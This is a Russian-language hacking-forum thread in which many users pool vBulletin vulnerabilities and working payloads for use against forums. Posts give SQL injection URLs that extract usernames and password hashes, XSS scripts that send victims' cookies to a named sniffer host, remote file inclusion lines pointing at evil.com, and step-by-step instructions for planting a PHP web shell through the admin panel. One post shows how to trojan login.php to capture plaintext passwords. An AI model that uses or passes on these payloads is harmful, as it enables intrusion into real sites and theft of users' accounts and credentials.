![]() |
[Обзор уязвимостей vBulletin]
На форуме есть обзоры уязвимостей ipb и phpbb, я решил сделать обзор уязвимостей vBulletin-). Итак начну.
Рассмотрим уязвимости трёх веток воблы: 2.*.*, 3.0.* и 3.1.*. Узнаём версию форума. В папке /clientscript/ находятся несколко js и css файлов в которых можно посмотреть точную версию форума. Код:
vbulletin_ajax_threadslist.jsКод:
www.xz.сom/forumpath/clientscript/vbulletin_editor.cssvBulletin 2 2.2.* - 2.2.4 - Выполнение произвольного кода Описание уязвимости: уязвимость в vBulletin's Calendar PHP сценарии (calender.php) позволяет удаленному атакующему выполнять произвольный код в контексте пользователя 'nobody'. Exploit: http://www.securitylab.ru/vulnerability/source/207147.php 2.3.* - SQL injection Описанте уязвимости: уязвимость в проверке правильности входных данных в 'calendar.php'. Удаленный пользователь может внедрить произвольные SQL команды. Пример: Код:
www.xz.сom/forumpath/calendar.php?s=&action=edit&eventid=14 union (SELECT allowsmilies,public,userid,'0000-0-0',version(),userid FROM calendar_events WHERE eventid = 14) order by eventdateОписание уязвимости: уязвимость существует из-за недостаточной обработки тэга email. Exploit: Код:
[E*MAIL]aaa@aaa.aa"'s='[/E*MAIL]' sss="i=new Image(); i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null" style=top:expression(eval(this.sss));vBulletin 3.0 3.0.0 - XSS Описание уязвимости: уязвимость существует в сценарии search.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта. Пример: Код:
www.xz.сom/forumpath//search.php?do=process&showposts=0&query=<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>Описание уязвимости: уязвимость существует в сценарии forumdisplay.php из-за некорректной обработки глобальных переменных. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные команды на системе. Пример: Код:
www.xz.сom/forumpath/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."3.0.3–3.0.9 XSS Описание уязвимости: уязвимость существует при обработке входных данных в поле Статус. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Примечание: менять свой статус по умолчанию может только администрация, начиная от группы Модераторы. Пример: Код:
<body onLoad=img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;>Описание уязвимости: звимость существует из-за недостаточной обработки входных данных в параметре posthash в сценарии newthread.php. Удаленный пользователь может с помощью специально сформированного POST запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта. Пример: Код:
www.xz.сom/forumpath/newthread.php?do=newthread&f=3&subject=1234&WYSIWYG_HTML=%3Cp%3E%3C%2Fp%3E&s=&f=3&do=postthread&posthash=c8d3fe38b082b6d3381cbee17f1f1aca&poststarttime='%2Bimg = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;%2B'&sbutton=%D1%EE%E7%E4%E0%F2%FC+%ED%EE%E2%F3%FE+%F2%E5%EC%F3&parseurl=1&disablesmilies=1&emailupdate=3&postpoll=yes&polloptions=1234&openclose=1&stickunstick=1&iconid=0vBulletin 3.5 3.5.2 - XSS Описание уязвимости: Уязвимость существует при обработке входных данных в поле "title" в сценарии "calendar.php". Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта. Пример: Код:
TITLE:--------->Test<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>3.5.3 - XSS Описание уязвимости: уязвимость существует из-за недостаточной обработки входных данных в поле "Email Address" в модуле "Edit Email & Password". Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта. Примечание: удачная эксплуатация уязвимости возможна при включенных опциях "Enable Email features" и "Allow Users to Email Other Member". Пример: Код:
www.xz.сom/forumpath/profile.php?do=editpassword3.5.4 - Дамп БД Описание уязвимости: уязвимость существует из-за недостаточного ограничения на доступ к сценарию upgrade_301.php в каталоге 'install'. Удаленный пользователь может с помощью специально сформированного URL сделать дамп базы данных приложения. Пример: Код:
www.xz.com/forumpath/install/upgrade_301.php?step=SomeWord3.5.4 - XSS Описание уязвимости: уязвимость существует из-за недостаточной обработки входных данных в параметре url сценария inlinemod.php. Удаленный пользователь может с помощью специально сформированного POST запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта. Пример: Код:
www.xz.сom/forumpath/inlinemod.php?do=clearthread&url=lala2%0d%0aContent-Length:%2033%0d%0a%0d%0a<html>Hacked!</html>%0d%0a%0d%0aУязвимости в модулях vBulletin. vBug Tracker 3.5.1 - XSS Описание уязвимости: уязвимость существует из-за недостаточной обработки входных данных в параметре "sortorder" сценария vbugs.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта. Пример: Код:
www.xz.сom/forumpath/vbugs.php?do=list&s=&textsearch=&vbug_typeid=0&vbug_statusid=0&vbug_severityid=0&vbug_versionid=0&assignment=0&sortfield=lastedit&sortorder=%22%3Cscript%3Eimg = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;%3C/script%3EОписание уязвимости: уязвимость существует из-за недостаточной обработки входных данных в параметре "systempath" в сценарии ImpExData.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Пример: Код:
(1)ibProArcade 2.x - SQL injection Описание уязвимости: Уязвимость существует в модуле “Report” при обработке входных данных в параметре user сценария index.php. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных приложения. Пример: Код:
www.xz.сom/forumpath/index.php?act=ibProArcade&module=report&user=-1 union select password from user where userid=[any_user]При использовании XSS c указанным в теме снифером. Логи смотреть тут: http://antichat.ru/sniff/log.php Но лучше завести себе свой снифер -). Это можно сделать тут: http://antichat.ru/sniffer или тут: http://s.netsec.ru. Шелл в vBulletin. Разберёмся как залить шелл из админки воблы. Способ заливки шелла в vBulletin 2.*.* и 3.0.* 1. Заходим в админку. 2. Смайлы. 3. Загрузить смайл. 4. Грузим наш шелл. (папка по умолчанию /images/smilies) 5. Заходим www.xz.сom/forumpath/images/smilies/shell.php Примечание: сработает не везде. Способ заливки шелла в vBulletin 3.5.*. 1. Заходим в админку. 2. Система модулей. 3. Добавить новый модуль. Продукт: ставим vBulletin Месторасположение: Vbulletin: Справка - faq_complete Вставляем в тело код нашего шелла (шелл не должен превышать 60кб), проще сделать system($_GET["cmd"]); 4. Сохраняем, идём в faq (справка), всё теперь у нас есть шелл. Если он был такой system($_GET["cmd"]); делаем так www.xz.сom/forumpath/faq.php?cmd=тут команда Видео по теме: http://video.antichat.ru/file105.html http://video.antichat.ru/file95.html http://video.antichat.ru/file57.html http://video.antichat.ru/file3.html З.Ы. Сильно не ругаться. Если где-то был не прав, исправляем, если что-то упустил, добавляем... Не стал вылаживать некоторые XSS т.к. версия форума у них повторяется... |
Passive XSS vBulletin 3.6.x Admin Control Painel
еще дополнение:
Код:
Author: insanity |
Backup SQL-Dump Bypass vBulletin 3.5.х
www.xz.com/forumpath/install/upgrade_301.php?step=backup
вот это не стесняйтесь смело подставлять ко всей линейке 3.5.х, особливо к 3.5.1, проверено. Уязвимы особенно нуленые версии vBulletin |
VBulletin 3.6.4 [FLASH] (SWF) XSS
VBulletin 3.6.4
Уязвимость позволяет удаленному злоумышленнику выполнить произвольный сценарий на целевой системе. Уязвимость существует из-за ошибки в проверке входных данных при обработке входящих запросов. Атакующий может выполнить SWF произвольный сценарий и выкрасть данные аутентификации cookie. Пример: Код:
getURL("javascript:function blab(){}var scriptNode = +document.createElement('script'); document.getElementsByTagName('body')[0].appendChild(scriptNode);scriptNode.language='javascript';scriptNode.src= 'http://www.YourServer/UrPHPpage.php?Cookie='+document.cookie +;blab();");http://forum.antichat.ru/showpost.php?p=558935&postcount=28 |
Active XSS TopXStats
В список "уязвимости модулей" не плохо было бы так же добавить дыру в моде TopXStats (Статистика Х лучших). Ее легко узнать - в низу форума есть таблица с послденимим затронутыми темами. лучшими авторами и .т.п, таблица так и называется "Статистика лучших".
Пару месяцев назад там нашли дыру - не было фильтрации выходных данных, вернее на выходе данные спокойно трансформировались в html Достаточно создать тему в заголовке которой указать код редиректинга на свой сайт, и псевдодефейс готов. Через meta redirect например. Тогда с гл. страници пользователей будет перенаправлять на ваш дефейс. Для дыры достаточно скоро был выложен патч на Vbulletin.net.ru , но не все его установили, и некоторые все еще ставят старую версию хака (не пропатченную). Так что флаг вам в руки. Вместо meta redirect'a можно так же вставить сниффер, но поле "тема" имеет ограничение на кол-во символов, так что может не поместиться. |
эксплоит для флуда форума
Вот прикольный эксплоит для флуда форума.
Конечно это не поможет при взломе. но всётаки достаточно серьёзный баг. Код:
<?В принципе с помощю этого скрипта переполнить базу данных и остановить работу форума и даже сайта, т.к большинство хостеров ставят ограничение на обьём базы данных, достигнув который, в базу данных уже ничего нельзя будет записать, не почистив её. |
Active XSS [attachment.php] vBulletin 3.x
Вот свеженький баг, сам не проверял.
Программа: vBulletin 3.x Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. Уязвимость существует из-за недостаточной обработки входных данных в поле формы «Extension» сценарием admincp/attachment.php. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Автор: semu Дата: 08.02.2007 21:15:43 Чтобы юзать - должен быть доступ к админке, вобщем пригодиться конечно может в некоторых случаях. |
XSRF vBulletin 3.0.0
Вот ещё для полноты темы:
Робит только vBulletin 3.0.0 Beta 2 Уязвимость в проверке правильности ввода обнаружена в vBulletin при просмотре честных сообщений. Удаленный пользователь может выполнить XSS нападение. Сообщается, что сценарий private.php не фильтрует данные, представленные пользователем. Удаленный пользователь может сконструировать специально сформированную Web форму, которая, при загрузке в браузере пользователя, выполнить произвольный код сценария в браузере целевого пользователя в контексте vBulletin сайта. Пример: (требуется предварительная авторизация) Код:
<html> |
Code EXEC vBulletin 3.0.6
Помойму этого тоже не было ,если не ошибаюсь:
Программа: vBulletin 3.0.6 и более ранние версии Уязвимость позволяет удаленному пользователю выполнить произвольные команды на уязвимой системе с привилегиями web-сервера. Уязвимость существует при обработке имен шаблонов в сценарии 'misc.php' при включенной опции 'Add Template Name in HTML Comments' (не является значением по умолчанию). Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный код на системе. Пример: Код:
http://[target]/misc.php?do=page&template={${phpinfo()}} |
vBulletin <= 3.6.4 inlinemod.php "postids" sql injection / privilege
vBulletin <= 3.6.4 inlinemod.php "postids" sql injection / privilege (Требуются привилегии супермодератора)
http://milw0rm.com/exploits/3387 Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «postids» сценарием inlinemod.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. http://www.xakep.ru/post/36982/default.asp |
Ссылки на темы связанные с безопастностью (уязвимостями) vBulletin.
Vbulletin 3.6.x: Нападение XSS на Vbulletin 3.6.x для НОВИЧКОВ. ---------------------------------------------------------- Все сообщения не содержащие информационной ценности или не имеющие прямого отношения к теме удалены. ---------------------------------------------------------- Ещё раз напомню, что в этой теме обзор уязвимостей форума, сообщения не имеющие информационной ценности ("Немогли бы взглянуть на этот форум", "Подскажите версию" и т.д.) будут удаляться. |
Vbulletin Petz module all version
Не смог найти тему куда выложить сплойт, выложил сюда, если что модеры перенесите.
Вообщем сплойт дёргает пароль у заданного юзера, если сплойт не остановить, то он этому юзеру еще и сменит пароль. Новый пароль из хеша состоит только из цифр размером 8 символов. Код:
#!/usr/bin/perl |
Passive XSS [downloads.php] vBulletin 3.6.2
vBulletin 3.6.2
Пассивная хсс Уязвим параметр "id" скрипта "downloads.php" Пример: http://forum.asechka.ru/downloads.php?do=cat&id=5"><script>alert()</script> |
XSS [PDF] vBulletin 3.0.7 - 3.6.2
vBulletin 3.0.7 - 3.6.2
Активная хсс прикрепляем файл pdf созданный с содержанием: Код:
<script>alert()</script>этот способ работает в очень многих местах, также как и встраивание кода в картинку. минус этого способа, что не во всех местах можно прикреплять файлы. |
Active XSS in Title vBulletin 3.5.2
Программа: vBulletin 3.5.2
http://www.securitylab.ru/vulnerability/source/243694.php Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. Уязвимость существует из-за недостаточной обработки входных данных в параметре «title» сценарием calendar.php. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Код:
TITLE:--------->Test<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script> |
vBulletin 3.0.10
SQL Injection Код:
http://123.com/portal.php?id=54&a=viewfeature&featureid=99999/**/UNION/**/SELECT/**/0,1,2,3,4,username,6,7,8,9,10,11,12,password/**/from/**/user/**/where/**/userid=1/*Command Execution Exploit (metasploit) Код:
##Execute command magic_quotes_gpc должен быть выключен PHP код:
|
узнать версию форума
Вот что нашел.. Чтобы узнать версию форума.. иногда помогает..
http://domain/forum/install/finalupgrade.php И видим версию форума :) |
Active XSS v3.6.8
тут вроде бы не звучало еще 2 ХССки...
не знаю точно в каких версиях но на 3.6.2 и 3.6.4 помоему работало... В первом случае надо быть модератором (иметь право банить) и надо чтоб на форуме при бане было поле "причина" вот само поле "причина" и есть уязвимым... ищем жертву для бана и в причине вписываем Код:
Забанен за флуд <script>img = new Image(); img.src = "http://somesite.#ru/vash sniffer.jpg?"+document.cookie;</script>Во втором случае надо иметь возможность менять себе "Особый статус" и поддержку хтмл... Код:
Мой титул <script>img = new Image(); img.src = "http://somesite.#ru/vash sniffer.jpg?"+document.cookie;</script>но это испытывал всего один раз... надо быть или знакомым админа или еще какието обстоятельство )) _На некоторых сайтах стоит фикс типа ограничения колиества символов в строке ) -------------------------------------------------------------------- Добавленно от BlackCats (фактически тоже самое инфа про версию другая): 3.6.8 Patch.Level 1 active xss: если вы модератор на форуме, то при бане в поле "причина бана" указываете ваш скрипт, и он сработает: при просмотре забаненых пользователей через: модпанель(например туда может зайти СуперМодератор) админ панель(админ) когда зайдёт юзер в свой акк(сам юзер) PHP код:
PHP код:
раскрытие путей |
Active XSS in Tag [google] & [googlevideo]
Активная xss в популярном теге для булки - google и googlevideo
Код:
[google*video][U*RL=/onmouseover=alert(1);a="]213[/U*RL][/google*video]123 |
Code Exec + Xss
vBulletin v3.6.5
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Пример: [site]/vb/includes/functions.php?classfile=[Shell-Attack] [site]/vb/includes/functions_cron.php?nextitem=[Shell-Attack] [site]/vb/includes/functions_forumdisplay.php?specialtemplates=[Shell-Attack] vBulletin V3.6.8 Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. Уязвимость существует из-за недостаточной обработки входных данных во множестве сценариев множеством параметров. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Пример: [site]/[path]/faq.php?s=&do=search&q=%22%3E%3C%2Fscript%3E%3Cscr ipt%3Ealert%28document.cookie%29%3B%3C%2Fscript&ma tch= all&titlesonly=0 [site]/[path]/member.php?u=1=s'&do=search&q=%22%3E%3C%2Fscript%3 E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2F script&match=all&titlesonly=1 [site]/[path]/index.php?s=<script>alert('document.cookie')</script> [site]/[path]/faq.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Csc ript%3Ealert%28document.cookie%29%3B%3C%2Fscript &match=all&titlesonly=0 [site]/[path]/memberlist.php?s="&do=search&q=%22%3E%3C%2Fscript% 3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2 Fscript&match=all&titlesonly=0 [site]/[path]/calendar.php?s="&do=search&q=%22%3E%3C%2Fscript%3E %3Cscript%3Ealert%28document.cookie%29%3B%3C%2F script&match=all&titlesonly=0 [site]/[path]/search.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3 Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscrip t &match=all&titlesonly=0 [site]/[path]/search.php?do=getdaily"&do=search&q=%22%3E%3C%2Fsc ript%3E%3Cscript%3 Ealert%28document.cookie %29%3B%3C%2Fscript&match=all&titlesonly=0 [site]/[path]/forumdisplay.php?s="&do=search&q=%22%3E%3C%2Fscrip t%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2 Fscript &match=all&titlesonly=0 [site]/[path]/forumdisplay.php?do=markread"&do=search&q=%22%3E%3 C%2Fscript%3E%3Cscript%3E alert%28document.cookie %29%3B%3C%2Fscript&match=all&titlesonly=0 [site]/[path]/forumdisplay.php?f=1"&do=search&q=%22%3E%3C%2Fscri pt%3E%3Cscript%3Ealert%28document.cookie %29%3B%3C%2Fscript&match=all&titlesonly=0 [site]/[path]/showgroups.php?s="&do=search&q=%22%3E%3C%2Fscript% 3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fs cript& match=all&titlesonly=0 [site]/[path]/online.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3 Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscrip t& match=all&titlesonly=0 [site]/[path]/member.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3 Cscript%3Ealert%28document.cookie%29%3B%3C%2F script&match=all&titlesonly=0 [site]/[path]/sendmessage.php?s="&do=search&q=%22%3E%3C%2Fscript %3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2F script&match=all&titlesonly=0 Источник www.securitysib.com |
[HIDE] Tag Bypass
на некоторых форумах стоит хайд на ссылки, типа "зарегистрируйтесь, чтобы увидеть ссылку". вовсе не обязательно регаться, достаточно найти это сообщение через "найти все сообщения от ...". там ссылка будет в открытом виде. но обычно в поиске выводится только первые строки.
вот такая мего уязвимость) |
[HIDE] Tag Bypass
2 freddi это неявляются уязвимостью как ты написал. Просто авторы таких постов с хайдом толком не умеют пользоваться тегами. Как ты написал нужно находить все соообщения от пользователя - хмм а если их 1000 и нужное в середине ? а форум позволяет индексировать только 200 - 400 ? Ненужно искать посты все проще помещаем курсор на скрытый тескт и видим ссылку =).
|
SQL Injection в админке 3.6.5
SQL Injection в админке (тестировалось на версиях 3.6.4 и 3.6.5 )
1. Log in to admin panel 2. Go to Attachments->Search 3. Place the following string in the Attached Before field: Код:
') union select 1,1,1,1,1,userid,password,1,username from user -- 9 |
vBuserbar SQL-inj
Продукт: vBuserbar
Уязвимость: SQL-inj Автор: S(r1pt Адрес: http://vash_site/vbuserbar.php?do=groupinsert&name=' =\\ |
vBulletin <=3.5.3 Search DoS
vBulletin <=3.5.3 Search DoS Код:
#!/usr/bin/perl |
VBulletin 3.6.4 [FLASH] (SWF) XSS
Было много вопросов к посту:
Цитата:
Обзор работы SWF паразита Подделка заголовков HTTP запроса с помощью Flash ActionScript Bypassing JavaScript Filters the Flash! Attack Cross-Domain Data Access via Flash [CDDAF] Reference Forging HTTP Request Headers with Flash ActionScript |
из новых модов не было
vBulletin Mod RPG Inferno 2.4 (inferno.php) SQL Injection Vulnerability Exploit : http://site.com/forum/inferno.php?do=ScanMember&id=-1'/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,7,user(),database(),10,11,12,13,14,15, 16,17,18,19,20,21,22,23,24,25,26,27,28,29,concat(u sername,0x3a,password,0x3a,salt),31,@@version,33,3 4,35,36,37,38,39,40,41,42,43,44,45,46,47/**/from/**/user/**/where/**/usergroupid=6/**/limit/**/0,1/* vBulletin vBGSiteMap 2.41 (root) Remote File Inclusion Vulnerabilities Exploit : vBulletin_Forum_Bath/vbgsitemap/vbgsitemap-config.php?base=http://evil.com? vBulletin_Forum_Bath/vbgsitemap/vbgsitemap-vbseo.php?base=http://evil.com? ======= |
Vbulletin Tube (vBTube) XSS
Vbulletin Tube (vBTube) XSS
Exploit : Код:
vBTube.php?do=search&search=<script>alert(document.cookie);</script>Код:
http://www.ruhot.ru/forum/vBTube.php?do=search&search=%3Cscript%3Ealert(document.cookie);%3C/script%3E |
vBulletin Worm <= 3.0.6
vBulletin Worm <= 3.0.6
Код:
#!/usr/bin/perl |
узнать версию форума
На некоторых форумах версию форума можно узнать тут
forum/archive/index.php/ |
Сбор паролей от аккаунтов Vbulletin без расшифровки (трояним форум)
Сбор паролей от аккаунтов Vbulletin без расшифровки (трояним форум) По идее все просто: в файл login.php в корне сайта добавляем PHP код:
Посмотрим на форму регистрации: Код:
...Сама функция находится в clientscript/vbulletin_md5.js А там мы видим в конце: PHP код:
PHP код:
P.S. против автозахода (куки) можно стереть из бд все сессии P.P.S. Можно и не комментировать, а изменить переменную $un2=&$vbulletin->GPC['vb_login_md5password']; Все же md5(pass) побрутить легче, чем md5(md5(pass).salt) |
vBulletin 3.7.0 <= XSS Explot
vBulletin 3.7.0 <= XSS Explot
Found by RoBOTNIK http://[website]/[forumpath]/ajax.php?do=CheckUsername¶m=# EVIL XSS SCRIPT # http://www.site.com/forums/ajax.php?do=CheckUsername¶m=<script>alert('xss ');</script> |
vBulletin 3.7.0 листалка от DGT
vBulletin 3.7.0 листалка от DGT
может чем нить помочь если в папке с форумом лежит что нибудь ценное на всех версиях от DGT пашет. ЗЫ http://forum.antichat.org/threadnav25644-1-10.html |
Сбор паролей от аккаунтов Vbulletin без расшифровки (трояним форум)
Цитата:
1) Добавляем в начало файла login.php PHP код:
3) Для того чтобы обнулить сессии выполняем код: PHP код:
|
p0h n03s priv8 rootshell vbulletin pw logger
Код:
<?php |
Опровержение - Vbulletin 3.7.0 Gold Sql injection on faq.php
Цитата:
Я посмотрел щас код. Да, действительно толку в баги нет. Это ошибка логики, при одиночном символе происходит некорректное формирование запроса к бд. Заюзать с пользой невозможно. |
XSS vBanonymizer
XSS в вобле
{ У жертвы должно быть: Vbulletin forum - все версии vBanonymizer - любая версия до 24.06.08 } Цитата:
|
XSS (3.7.1 & 3.6.10)
XSS-base64
_http://securityvulns.ru/news/CGI/2008.06.14.html _http://securityvulns.ru/news/CGI/2008.06.19.html Exploit: http://localhost/vB3/admincp/index.php?redirect=data:text/html;base64, PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K http://localhost/vB3/modcp/index.php?redirect=data:text/html;base64, PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K |
Xss (3.7.2, 3.6.10)
XSS in admin logs - vBulletin 3.7.2 and lower, vBulletin 3.6.10 PL2 and lower
http://securityvulns.ru/Udocument137.html язвимость существует из-за недостаточной обработки параметров "PHP_SELF" и "do" при запросе несуществующей страницы. Exploit: 1) Оставляем в логах булки нашу хсс, используя данный эксплоит: Код HTML:
<html> /adminlog.php?do=view&script=&u=0&pp=15&orderby=scr ipt&page=1 Ограничения: PHP_SELF - 50 characters max and no slashes _REQUEST['do'] is limited to 20 characters Также сообщается, что злоумышленник может внедрить и выполнить произвольный PHP код на системе с привилегиями Web сервера. |
vbulletin Exploit Tool Box
This Box continue the 3 vbulletin exploits, under it you can use the vbulletin install path exploit, the other two exploits can be only watched.
Code can be found here: http://archive.cert.uni-stuttgart.de.../msg00243.html |
| Время: 04:19 |